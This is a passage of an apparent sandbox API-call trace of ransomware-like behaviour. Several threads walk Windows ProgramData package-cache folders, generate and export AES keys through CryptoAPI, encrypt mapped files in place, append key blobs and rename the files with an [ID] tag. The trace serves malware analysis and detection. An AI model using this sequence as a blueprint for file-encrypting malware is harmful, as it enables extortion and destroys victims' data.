Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0042.865] CreateFileMappingA (hFile=0x5a8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4f8 [0042.865] CryptAcquireContextA (in: phProv=0x1279fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1279fcec*=0x3448b60) returned 1 [0042.866] CryptGenKey (in: hProv=0x3448b60, Algid=0x6610, dwFlags=0x1, phKey=0x1279fce8 | out: phKey=0x1279fce8*=0x671830) returned 1 [0042.866] CryptExportKey (in: hKey=0x671830, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1279fbe4, pdwDataLen=0x1279fce4 | out: pbData=0x1279fbe4*, pdwDataLen=0x1279fce4*=0x2c) returned 1 [0042.866] MapViewOfFile (hFileMappingObject=0x4f8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x710a0) returned 0x8c30000 [0042.945] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1279fbe4*, pdwDataLen=0x1279fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1279fbe4*, pdwDataLen=0x1279fcf8*=0x100) returned 1 [0042.945] CryptEncrypt (in: hKey=0x671830, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c30000, pdwDataLen=0x1279fce4*=0x710a0, dwBufLen=0x710a0 | out: pbData=0x8c30000*, pdwDataLen=0x1279fce4*=0x710a0) returned 1 [0043.155] UnmapViewOfFile (lpBaseAddress=0x8c30000) returned 1 [0043.161] CloseHandle (hObject=0x4f8) returned 1 [0043.161] CryptDestroyKey (hKey=0x671830) returned 1 [0043.161] CryptReleaseContext (hProv=0x3448b60, dwFlags=0x0) returned 1 [0043.161] SetFilePointerEx (in: hFile=0x5a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.162] WriteFile (in: hFile=0x5a8, lpBuffer=0x1279fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1279fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1279fbe4*, lpNumberOfBytesWritten=0x1279fcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.162] WriteFile (in: hFile=0x5a8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1279fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1279fcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.162] CloseHandle (hObject=0x5a8) returned 1 [0043.167] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.167] FindNextFileW (in: hFindFile=0x5d8a10, lpFindFileData=0x1279fd30 | out: lpFindFileData=0x1279fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a0db1a0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a0db1a0, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1073de80, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x710a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcredist_x64.exe", cAlternateFileName="VCREDI~1.EXE")) returned 0 [0043.167] FindClose (in: hFindFile=0x5d8a10 | out: hFindFile=0x5d8a10) returned 1 Thread: id = 241 os_tid = 0x960 [0040.558] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*.*", lpFindFileData=0x128dfd30 | out: lpFindFileData=0x128dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8a10 [0042.084] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.084] FindNextFileW (in: hFindFile=0x5d8a10, lpFindFileData=0x128dfd30 | out: lpFindFileData=0x128dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.084] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.084] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.084] FindNextFileW (in: hFindFile=0x5d8a10, lpFindFileData=0x128dfd30 | out: lpFindFileData=0x128dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0042.084] lstrcmpW (lpString1=".", lpString2="packages") returned -1 [0042.084] lstrcmpW (lpString1="..", lpString2="packages") returned -1 [0042.084] lstrcmpiW (lpString1="windows", lpString2="packages") returned 1 [0042.084] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*.*" [0042.084] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*.*") returned 87 [0042.084] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\", lpString2="packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages" [0042.084] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\*.*" [0042.085] GlobalMemoryStatus (in: lpBuffer=0x128dfd10 | out: lpBuffer=0x128dfd10) [0042.085] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10988880, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x534 [0042.085] CloseHandle (hObject=0x534) returned 1 [0042.085] FindNextFileW (in: hFindFile=0x5d8a10, lpFindFileData=0x128dfd30 | out: lpFindFileData=0x128dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0042.085] FindClose (in: hFindFile=0x5d8a10 | out: hFindFile=0x5d8a10) returned 1 Thread: id = 242 os_tid = 0x974 [0040.560] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\*.*", lpFindFileData=0x12a1fd30 | out: lpFindFileData=0x12a1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8a90 [0042.096] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.096] FindNextFileW (in: hFindFile=0x5d8a90, lpFindFileData=0x12a1fd30 | out: lpFindFileData=0x12a1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.096] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.096] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.096] FindNextFileW (in: hFindFile=0x5d8a90, lpFindFileData=0x12a1fd30 | out: lpFindFileData=0x12a1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0042.096] lstrcmpW (lpString1=".", lpString2="packages") returned -1 [0042.096] lstrcmpW (lpString1="..", lpString2="packages") returned -1 [0042.096] lstrcmpiW (lpString1="windows", lpString2="packages") returned 1 [0042.096] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\*.*" [0042.096] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\*.*") returned 87 [0042.096] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\", lpString2="packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages" [0042.096] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\*.*" [0042.096] GlobalMemoryStatus (in: lpBuffer=0x12a1fd10 | out: lpBuffer=0x12a1fd10) [0042.097] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5c48250, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x53c [0042.097] CloseHandle (hObject=0x53c) returned 1 [0042.097] FindNextFileW (in: hFindFile=0x5d8a90, lpFindFileData=0x12a1fd30 | out: lpFindFileData=0x12a1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0042.097] FindClose (in: hFindFile=0x5d8a90 | out: hFindFile=0x5d8a90) returned 1 Thread: id = 243 os_tid = 0x970 [0040.560] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\*.*", lpFindFileData=0x12b5fd30 | out: lpFindFileData=0x12b5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa931c450, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa931c450, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8a90 [0042.094] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.094] FindNextFileW (in: hFindFile=0x5d8a90, lpFindFileData=0x12b5fd30 | out: lpFindFileData=0x12b5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa931c450, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa931c450, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.094] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.094] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.094] FindNextFileW (in: hFindFile=0x5d8a90, lpFindFileData=0x12b5fd30 | out: lpFindFileData=0x12b5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa931c450, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa931c450, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0042.094] lstrcmpW (lpString1=".", lpString2="packages") returned -1 [0042.094] lstrcmpW (lpString1="..", lpString2="packages") returned -1 [0042.094] lstrcmpiW (lpString1="windows", lpString2="packages") returned 1 [0042.094] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\*.*" [0042.094] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\*.*") returned 87 [0042.094] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\", lpString2="packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages" [0042.094] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\*.*" [0042.094] GlobalMemoryStatus (in: lpBuffer=0x12b5fd10 | out: lpBuffer=0x12b5fd10) [0042.094] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5ed00d8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x53c [0042.095] CloseHandle (hObject=0x53c) returned 1 [0042.095] FindNextFileW (in: hFindFile=0x5d8a90, lpFindFileData=0x12b5fd30 | out: lpFindFileData=0x12b5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa931c450, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa931c450, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0042.095] FindClose (in: hFindFile=0x5d8a90 | out: hFindFile=0x5d8a90) returned 1 Thread: id = 244 os_tid = 0x96c [0040.562] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*.*", lpFindFileData=0x12c9fd30 | out: lpFindFileData=0x12c9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a20bca0, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a20bca0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8a10 [0042.082] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.082] FindNextFileW (in: hFindFile=0x5d8a10, lpFindFileData=0x12c9fd30 | out: lpFindFileData=0x12c9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a20bca0, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a20bca0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.082] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.082] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.082] FindNextFileW (in: hFindFile=0x5d8a10, lpFindFileData=0x12c9fd30 | out: lpFindFileData=0x12c9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a20bca0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a20bca0, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a20bca0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0042.082] lstrcmpW (lpString1=".", lpString2="packages") returned -1 [0042.082] lstrcmpW (lpString1="..", lpString2="packages") returned -1 [0042.082] lstrcmpiW (lpString1="windows", lpString2="packages") returned 1 [0042.082] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*.*" [0042.083] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*.*") returned 86 [0042.083] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\", lpString2="packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages" [0042.083] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*.*" [0042.083] GlobalMemoryStatus (in: lpBuffer=0x12c9fd10 | out: lpBuffer=0x12c9fd10) [0042.083] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x99d2d90, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x534 [0042.083] CloseHandle (hObject=0x534) returned 1 [0042.083] FindNextFileW (in: hFindFile=0x5d8a10, lpFindFileData=0x12c9fd30 | out: lpFindFileData=0x12c9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a20bca0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a20bca0, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a20bca0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0042.084] FindClose (in: hFindFile=0x5d8a10 | out: hFindFile=0x5d8a10) returned 1 Thread: id = 245 os_tid = 0x964 [0040.562] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*.*", lpFindFileData=0x30cfd30 | out: lpFindFileData=0x30cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a199880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a1e5b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a1e5b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8a10 [0042.080] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.080] FindNextFileW (in: hFindFile=0x5d8a10, lpFindFileData=0x30cfd30 | out: lpFindFileData=0x30cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a199880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a1e5b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a1e5b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.080] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.080] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.080] FindNextFileW (in: hFindFile=0x5d8a10, lpFindFileData=0x30cfd30 | out: lpFindFileData=0x30cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a1e5b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a1e5b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0042.080] lstrcmpW (lpString1=".", lpString2="packages") returned -1 [0042.080] lstrcmpW (lpString1="..", lpString2="packages") returned -1 [0042.080] lstrcmpiW (lpString1="windows", lpString2="packages") returned 1 [0042.081] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*.*" [0042.081] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*.*") returned 86 [0042.081] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\", lpString2="packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages" [0042.081] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*.*" [0042.081] GlobalMemoryStatus (in: lpBuffer=0x30cfd10 | out: lpBuffer=0x30cfd10) [0042.081] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5f18e80, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x534 [0042.082] CloseHandle (hObject=0x534) returned 1 [0042.082] FindNextFileW (in: hFindFile=0x5d8a10, lpFindFileData=0x30cfd30 | out: lpFindFileData=0x30cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a1e5b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a1e5b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0042.082] FindClose (in: 